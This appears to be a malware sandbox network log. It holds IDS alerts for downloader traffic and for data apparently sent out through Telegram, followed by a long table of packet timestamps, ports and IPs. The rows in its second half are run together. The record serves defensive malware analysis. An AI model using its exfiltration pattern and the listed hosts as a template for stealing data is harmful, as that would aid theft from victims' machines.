2025-01-11T01:27:44.715728+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 49707 | 193.122.6.168 | 80 | TCP
2025-01-11T01:27:52.052474+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49730 | 104.21.80.1 | 443 | TCP
2025-01-11T01:27:54.453173+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 49749 | 149.154.167.220 | 443 | TCP
2025-01-11T01:27:57.856250+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 55408 | 193.122.6.168 | 80 | TCP
2025-01-11T01:27:58.731232+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 55408 | 193.122.6.168 | 80 | TCP
2025-01-11T01:27:59.327823+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 55420 | 104.21.80.1 | 443 | TCP
2025-01-11T01:28:00.045467+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 55426 | 193.122.6.168 | 80 | TCP
2025-01-11T01:28:00.629747+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 55431 | 104.21.80.1 | 443 | TCP
2025-01-11T01:28:00.809278+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.5 | 55432 | 149.154.167.220 | 443 | TCP
2025-01-11T01:28:01.328649+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 55438 | 193.122.6.168 | 80 | TCP
2025-01-11T01:28:02.637495+0100 | 2803274 | ETPRO MALWARE Common Downloader Header Pattern UH | 2 | 192.168.2.5 | 55446 | 193.122.6.168 | 80 | TCP
2025-01-11T01:28:09.331890+0100 | 1810007 | Joe Security ANOMALY Telegram Send Message | 1 | 192.168.2.5 | 55499 | 149.154.167.220 | 443 | TCP
2025-01-11T01:28:15.302844+0100 | 1810008 | Joe Security ANOMALY Telegram Send File | 1 | 192.168.2.5 | 55539 | 149.154.167.220 | 443 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jan 11, 2025 01:27:41.639647961 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:41.644618988 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:41.644737959 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:41.645015001 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:41.649780035 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:42.292053938 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:42.297210932 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:42.302716017 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:42.488945961 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:42.542716980 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:42.542776108 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:42.542859077 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:42.543736935 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:42.549335003 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:42.549376011 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.009730101 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.010073900 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.015486002 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.015508890 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.015846014 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.059490919 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.070092916 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.111341000 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.202174902 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.202243090 CET | 443 | 49705 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.202302933 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.208604097 CET | 49705 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.211663008 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:43.216614008 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:43.401844025 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:43.404824972 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.404874086 CET | 443 | 49706 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.404944897 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.405293941 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.405311108 CET | 443 | 49706 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.449971914 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:43.885624886 CET | 443 | 49706 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:43.888077021 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:43.888111115 CET | 443 | 49706 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:44.030904055 CET | 443 | 49706 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:44.030992031 CET | 443 | 49706 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:44.031040907 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:44.031500101 CET | 49706 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:44.035041094 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:44.036283970 CET | 49707 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:44.040117025 CET | 80 | 49704 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:44.040179014 CET | 49704 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:44.041105986 CET | 80 | 49707 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:44.041234970 CET | 49707 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:44.041424036 CET | 49707 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:44.046257973 CET | 80 | 49707 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:44.668097973 CET | 80 | 49707 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:44.669581890 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:44.669636965 CET | 443 | 49708 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:44.669739962 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:44.670000076 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:44.670015097 CET | 443 | 49708 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:44.715728045 CET | 49707 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:45.170454025 CET | 443 | 49708 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:45.173527956 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:45.173577070 CET | 443 | 49708 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:45.304063082 CET | 443 | 49708 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:45.304131031 CET | 443 | 49708 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:45.304186106 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:45.313810110 CET | 49708 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:45.481336117 CET | 49709 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:45.486346960 CET | 80 | 49709 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:45.486435890 CET | 49709 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:45.486644030 CET | 49709 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:45.494689941 CET | 80 | 49709 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:46.146157980 CET | 80 | 49709 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:46.147474051 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:46.147537947 CET | 443 | 49710 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:46.147618055 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:46.147855997 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:46.147875071 CET | 443 | 49710 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:46.199989080 CET | 49709 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:46.605089903 CET | 443 | 49710 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:46.606766939 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:46.606803894 CET | 443 | 49710 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:46.761888027 CET | 443 | 49710 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:46.761956930 CET | 443 | 49710 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:46.762021065 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:46.762770891 CET | 49710 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:46.766015053 CET | 49709 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:46.766978025 CET | 49711 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:46.771120071 CET | 80 | 49709 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:46.771220922 CET | 49709 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:46.771832943 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:46.772015095 CET | 49711 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:46.772192001 CET | 49711 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:46.777020931 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:47.427202940 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:47.428492069 CET | 49712 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:47.428565979 CET | 443 | 49712 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:47.428643942 CET | 49712 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:47.428880930 CET | 49712 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:47.428894997 CET | 443 | 49712 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:47.481312990 CET | 49711 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:47.901679993 CET | 443 | 49712 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:47.931583881 CET | 49712 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:47.931638002 CET | 443 | 49712 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:48.042716980 CET | 443 | 49712 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:48.042788982 CET | 443 | 49712 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:48.042844057 CET | 49712 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:48.050033092 CET | 49712 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:48.073968887 CET | 49711 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:48.075295925 CET | 49713 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:48.080195904 CET | 80 | 49713 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:48.080271959 CET | 49713 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:48.080365896 CET | 49713 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:48.083548069 CET | 80 | 49711 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:48.083606958 CET | 49711 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:48.085150957 CET | 80 | 49713 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:48.744534969 CET | 80 | 49713 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:48.745994091 CET | 49714 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:48.746048927 CET | 443 | 49714 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:48.746135950 CET | 49714 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:48.746465921 CET | 49714 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:48.746480942 CET | 443 | 49714 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:48.793946028 CET | 49713 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:49.208023071 CET | 443 | 49714 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:49.213571072 CET | 49714 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:49.213610888 CET | 443 | 49714 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:49.364829063 CET | 443 | 49714 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:49.365323067 CET | 443 | 49714 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:49.365396023 CET | 49714 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:49.365888119 CET | 49714 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:49.369378090 CET | 49713 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:49.370624065 CET | 49716 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:49.374455929 CET | 80 | 49713 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:49.374535084 CET | 49713 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:49.375472069 CET | 80 | 49716 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:49.375582933 CET | 49716 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:49.375657082 CET | 49716 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:49.380475998 CET | 80 | 49716 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:50.033744097 CET | 80 | 49716 | 193.122.6.168 | 192.168.2.5
Jan 11, 2025 01:27:50.035156012 CET | 49717 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:50.035212994 CET | 443 | 49717 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:50.035279036 CET | 49717 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:50.035547972 CET | 49717 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:50.035562038 CET | 443 | 49717 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:50.075000048 CET | 49716 | 80 | 192.168.2.5 | 193.122.6.168
Jan 11, 2025 01:27:50.508681059 CET | 443 | 49717 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:50.559976101 CET | 49717 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:50.654230118 CET | 49717 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:50.654256105 CET | 443 | 49717 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:50.774313927 CET | 443 | 49717 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:50.774451971 CET | 443 | 49717 | 104.21.80.1 | 192.168.2.5
Jan 11, 2025 01:27:50.774494886 CET | 49717 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:50.774812937 CET | 49717 | 443 | 192.168.2.5 | 104.21.80.1
Jan 11, 2025 01:27:50.777589083 CET | 49716 | 80 | 192.168.2.5 | 193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.778569937 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.782715082 CET8049716193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.782764912 CET4971680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.783433914 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:50.783489943 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.783591986 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:50.788309097 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.420068979 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.421521902 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.421576977 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.421644926 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.422096014 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.422115088 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.465610981 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:51.903615952 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:51.905245066 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:51.905282021 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.052480936 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.052545071 CET44349730104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.052788019 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.053277016 CET49730443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.058559895 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.063667059 CET8049723193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.063750029 CET4972380192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.070055008 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.074954987 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.075074911 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.076690912 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:52.081496954 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.705743074 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.707067966 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.707187891 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.707292080 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.707648039 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:52.707680941 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:52.746857882 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:53.161350965 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.215647936 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.439909935 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.439945936 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.568624973 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.568692923 CET44349744104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.568902969 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.569235086 CET49744443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:53.588011026 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:53.592724085 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:53.592757940 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.592817068 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:53.592926979 CET8049737193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.593312025 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:53.593323946 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.596005917 CET4973780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:53.972910881 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:53.977742910 CET53553871.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:53.978173018 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:53.983129025 CET53553871.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.210448027 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.210529089 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.213495970 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.213500977 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.213836908 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.215225935 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.259322882 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.427944899 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:54.432825089 CET53553871.1.1.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.432868004 CET5538753192.168.2.51.1.1.1
                                                                                                                  Jan 11, 2025 01:27:54.453206062 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.453284979 CET44349749149.154.167.220192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:54.456027031 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:54.469811916 CET49749443192.168.2.5149.154.167.220
                                                                                                                  Jan 11, 2025 01:27:56.944425106 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:56.949266911 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:56.952271938 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:56.952271938 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:56.957027912 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.622175932 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.625521898 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:57.630280018 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.811250925 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.845560074 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:57.845597982 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.846101999 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:57.850104094 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:57.850119114 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:57.856250048 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:58.325192928 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.325264931 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.326755047 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.326761961 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.327040911 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.371855974 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.378186941 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.419331074 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.493010044 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.493065119 CET44355414104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.493406057 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.495877981 CET55414443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.499219894 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:58.504460096 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.685503960 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.687796116 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.687819004 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.687875986 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.688175917 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:58.688184977 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:58.731231928 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.169553995 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.172019005 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:59.172044039 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.327836037 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.327891111 CET44355420104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.327930927 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:59.328610897 CET55420443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:27:59.336785078 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.339382887 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.341711044 CET8055408193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.341770887 CET5540880192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.344152927 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.344213009 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.344325066 CET5542680192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.349081039 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:27:59.739092112 CET4970780192.168.2.5193.122.6.168
                                                                                                                  Jan 11, 2025 01:27:59.993185043 CET8055426193.122.6.168192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.024843931 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.024904966 CET44355431104.21.80.1192.168.2.5
                                                                                                                  Jan 11, 2025 01:28:00.024996996 CET55431443192.168.2.5104.21.80.1
                                                                                                                  Jan 11, 2025 01:28:00.029208899 CET55431443192.168.2.5104.21.80.1
